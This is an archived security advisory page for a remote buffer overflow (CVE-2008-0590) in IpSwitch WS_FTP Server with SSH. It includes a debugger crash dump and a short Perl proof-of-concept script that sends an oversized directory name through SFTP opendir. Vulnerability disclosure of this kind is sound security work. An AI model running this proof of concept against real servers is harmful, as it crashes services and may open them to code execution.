SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
Search :
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

IpSwitch WS_FTPSERVER with SSH remote Buffer Overflow


Arrow  SecurityAlert : 3609
Arrow  CVE : CVE-2008-0590
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : Yes
Arrow  Exploit Given : Yes
Arrow  Credit : securfrog
Arrow  Published : 05.02.2008

Arrow  Affected Software : WS_FTP Server



Arrow  Advisory Text :  

#IpSwitch WS_FTPSERVER with SSH remote Buffer Overflow

#

# Website:http://www.wsftp.com/products/ws_ftp_server/

#

# Version:6.1.0.0 ( last one,others might be vuln too )

#

# Bug: Remote Buffer Overflow ( CD)

#

# (8e8.a78): Access violation - code c0000005 (first chance)

# First chance exceptions are reported before any exception handling.

# This exception may be expected and handled.

# eax=00000000 ebx=00000000 ecx=00410041 edx=7c9137d8 esi=00000000
edi=00000000

# eip=00410041 esp=04b8c830 ebp=04b8c850 iopl=0 nv up ei pl zr na
po nc

# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010246

# 00410041 ?? ???

#

#

#Here's the PoC :

use strict;

use Net::SSH2;

my $ip="127.0.0.1";

my $port=22;

my $user="USERNAME";

my $pass="PASSWORD";

my $ssh2 = Net::SSH2->new();

my $payload ="A" x 5131;

$ssh2->connect($ip, $port) || die "could not connect";

$ssh2->auth_password($user,$pass)|| die "wrong passwd/login";

print "Poc running ...n";

my $sftp = $ssh2->sftp

my $dir = $sftp->opendir($payload);

print "Buffer Overflow Successfulln";

$ssh2->disconnect();

exit;





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

Multiple Vendors libc/gdtoa printf(3) Array Overrun

Security Risk High- 2009-05-30

SecurityReason realised new advisory about vulnerabilities libc/gdtoa...

Apache RSS Apache Alert

» Apache Tomcat
   RequestDispatcher
   directory traversal
   vulnerability

» Apache mod_dav / svn
   Remote Denial of Service
   Exploit

» Apache Tomcat Information
   disclosure

» Apache Tomcat User
   enumeration vulnerability
   with FORM authentication

PHP RSS PHP Alert

» PHP 5.2.9 curl safe_mode
   & open_basedir bypass

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file

Copyright © SecurityReason.com. All Rights Reserved.